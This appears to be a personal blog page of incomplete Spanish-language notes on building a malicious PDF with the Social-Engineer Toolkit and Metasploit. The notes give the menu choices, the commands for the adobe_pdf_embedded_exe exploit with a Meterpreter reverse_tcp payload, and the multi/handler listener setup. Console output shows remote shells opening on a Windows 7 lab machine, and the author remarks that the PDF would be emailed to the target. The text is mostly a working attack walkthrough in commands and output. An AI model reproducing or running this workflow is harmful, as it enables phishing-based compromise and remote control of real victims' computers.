Setoolkit Social Engineer Toolkit
Apuntes incompletos Setoolkit Social Engineer Toolkit
em50l@jejo.es$
root@kali:~# setoolkit [-] New set.config.py file generated on: 2019-07-25 18:20:23.599801 [-] Verifying configuration update... [*] Update verified, config timestamp is: 2019-07-25 18:20:23.599801 [*] SET is using the new config, no need to restart Copyright 2019, The Social-Engineer Toolkit (SET) by TrustedSec, LLC All rights reserved. ...
Seleccionamos 1 Social-Engineering Attacks
Select from the menu: 1) Social-Engineering Attacks 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1
Despues 1 Spear-Phishing
Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) Third Party Modules 99) Return back to the main menu. set> 1
y 2 Create a FileFormat Payload
The Spearphishing module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is in- stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON. There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy! 1) Perform a Mass Email Attack 2) Create a FileFormat Payload 3) Create a Social-Engineering Template 99) Return to Main Menu set:phishing>2
Escogemos 14 Adobe util.printf() Buffer Overflow
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2) SET Custom Written Document UNC LM SMB Capture Attack 3) MS15-100 Microsoft Windows Media Center MCL Vulnerability 4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01) 5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 7) Adobe Flash Player "Button" Remote Code Execution 8) Adobe CoolType SING Table "uniqueName" Overflow 9) Adobe Flash Player "newfunction" Invalid Pointer Use 10) Adobe Collab.collectEmailInfo Buffer Overflow 11) Adobe Collab.getIcon Buffer Overflow 12) Adobe JBIG2Decode Memory Corruption Exploit 13) Adobe PDF Embedded EXE Social Engineering 14) Adobe util.printf() Buffer Overflow 15) Custom EXE to VBA (sent via RAR) (RAR required) 16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 17) Adobe PDF Embedded EXE Social Engineering (NOJS) 18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 19) Apple QuickTime PICT PnSize Buffer Overflow 20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 21) Adobe Reader u3D Memory Corruption Vulnerability 22) MSCOMCTL ActiveX Buffer Overflow (ms12-027) set:payloads>14
Y Por ultimo el tipo de exploit que va dentro del payload.
1 Windows Reverse TCP Shell
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter set:payloads>1
Y por ultimo configuramos los parametros del exploit.
En este caso IP/url a la que se conetara y Puerto.
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.4]: set:payloads> Port to connect back on [443]: [-] Defaulting to port 443... [*] All good! The directories were created. [-] Generating fileformat exploit... [*] Waiting for payload generation to complete (be patient, takes a bit)... [*] Waiting for payload generation to complete (be patient, takes a bit)... [*] Waiting for payload generation to complete (be patient, takes a bit)... [*] Waiting for payload generation to complete (be patient, takes a bit)... ... ... [*] Payload creation complete. [*] All payloads get sent to the template.pdf directory [-] As an added bonus, use the file-format creator in SET to create your attachment.
Nota: las compilaciones cruzadas parece que no funcionan. (desde un arm=>x86)
El archivo esta en la ruta:
root@kali:~# find /root | grep template.pdf /root/.msf4/local/template.pdf /root/.set/template.pdf root@kali:~#
no ha funcionado ninguno
Pero esto parece que si que ha funcionado
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > run [*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'... [*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'... [*] Using 'windows/meterpreter/reverse_tcp' as payload... [+] Parsing Successful. Creating 'evil.pdf' file... [+] evil.pdf stored at /root/.msf4/local/evil.pdf msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set lport 8080 lport => 8080 msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.56.102:443 ^C[-] Exploit failed [user-interrupt]: Interrupt [-] run: Interrupted msf5 exploit(multi/handler) > set lport 8080 lport => 8080 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.56.102:8080 [*] Sending stage (179779 bytes) to 192.168.56.104 [*] Meterpreter session 3 opened (192.168.56.102:8080 -> 192.168.56.104:49170) at 2019-07-25 18:32:22 -0400 meterpreter >
intento 2
msf5 > use exploit/windows/fileformat/ Display all 183 possibilities? (y or n) use exploit/windows/fileformat/a_pdf_wav_to_mp3 use exploit/windows/fileformat/abbs_amp_lst use exploit/windows/fileformat/acdsee_fotoslate_string use exploit/windows/fileformat/acdsee_xpm ... ... msf5 > use exploit/windows/fileformat/adobe_pdf_embedded_exe msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) >info msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set lhost 192.168.56.101 lhost => 192.168.56.101 msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set lport 8080 lport => 8080 msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set filename adobe_pdf_embedded_exe_192_168_56_101_8080.pdf filename => adobe_pdf_embedded_exe_192_168_56_101_8080.pdf msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > run [*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'... [*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'... [*] Using 'windows/meterpreter/reverse_tcp' as payload... [+] Parsing Successful. Creating 'adobe_pdf_embedded_exe_192_168_56_101_8080.pdf' file... [+] adobe_pdf_embedded_exe_192_168_56_101_8080.pdf stored at /root/.msf4/local/adobe_pdf_embedded_exe_192_168_56_101_8080.pdf msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) >
Una vez creado el pdf a abrir en la maquina. habria que enviarlo. (ej correo) Y lanzar el servicio a la escucha. (reverse_tcp).
lanzo el “multi/handler” a mano desde msfconsole.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set lport 8080
run
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 192.168.56.101 LHOST => 192.168.56.101 msf5 exploit(multi/handler) > set lport 8080 lport => 8080 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.56.101:8080 [*] Sending stage (179779 bytes) to 192.168.56.1 [*] Meterpreter session 1 opened (192.168.56.101:8080 -> 192.168.56.1:44396) at 2019-07-26 05:05:47 -0400 meterpreter > sysinfo Computer : W7MINPC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : es_ES Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter >
lanzo el “multi/handler” a mano desde msfconsole.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set lport 443
run
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set lport 443
run